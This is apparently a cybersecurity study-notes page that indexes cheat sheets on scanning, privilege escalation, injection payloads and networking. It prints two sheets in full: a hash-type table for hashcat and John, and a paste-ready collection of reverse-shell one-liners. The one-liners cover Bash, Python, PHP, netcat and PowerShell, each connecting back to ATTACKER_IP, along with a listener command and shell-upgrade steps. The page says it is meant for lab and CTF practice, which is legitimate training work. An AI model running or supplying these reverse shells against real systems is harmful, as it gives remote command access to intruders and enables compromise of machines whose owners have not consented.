Condensed reference notes on key cybersecurity and networking topics. Use these alongside labs and workbooks for quick lookups during practice.
All scan types, timing templates, NSE scripts, and output formats in one page.
Ordered checklist: SUID, sudo, cron, PATH, kernel exploits, weak permissions.
Bash, Python, PHP, Perl, PowerShell, and netcat reverse shells ready to paste.
Move files between attacker and target: HTTP, SCP, SMB, base64, netcat tricks.
Quick reference: hash format β hashcat -m number. Covers MD5, SHA, NTLM, bcrypt.
Windows, Linux, PHP, Python payloads. Staged vs stageless. Encoding options.
UNION-based, blind boolean, time-based, error-based payloads for MySQL, MSSQL, PostgreSQL.
Reflected, stored, DOM XSS. Filter bypasses, cookie theft, keylogger templates.
A01βA10 with examples, testing approaches, and key mitigations for each category.
Layer-by-layer: protocols, PDUs, devices, and security implications of each layer.
All /prefix values with masks, wildcards, host counts, and block sizes. Print and keep.
Essential show commands, interface config, routing setup, and troubleshooting sequences.
TCP/UDP well-known ports 0β1024 and common higher ports. Essential for exams and CTFs.
Standard vs extended ACLs, wildcard masks, placement rules, and named ACL syntax.
Neighbour states, LSA types, DR/BDR election, area types, and verification commands.
Set up a listener first: nc -lvnp 4444
# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
# Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PHP
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Netcat (with -e)
nc ATTACKER_IP 4444 -e /bin/bash
# Netcat (without -e, pipe trick)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f
# PowerShell (Windows)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Upgrade shell to fully interactive TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then: Ctrl+Z β stty raw -echo; fg β export TERM=xterm| Hash Type | Example | Hashcat -m | John Format |
|---|---|---|---|
| MD5 | 5f4dcc3b5aa765d61d8327deb882cf99 | 0 | raw-md5 |
| SHA-1 | 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 | 100 | raw-sha1 |
| SHA-256 | 5e884898da28047151d0e56f8... | 1400 | raw-sha256 |
| SHA-512 | b109f3bbbc244eb82441917... | 1700 | raw-sha512 |
| NTLM | 31d6cfe0d16ae931b73c59d7e0c089c0 | 1000 | nt |
| MD5crypt ($1$) | $1$salt$hash | 500 | md5crypt |
| SHA-256crypt ($5$) | $5$salt$hash | 7400 | sha256crypt |
| SHA-512crypt ($6$) | $6$salt$hash | 1800 | sha512crypt |
| bcrypt ($2a$) | $2a$12$... | 3200 | bcrypt |
| MySQL4 | *hash | 300 | mysql |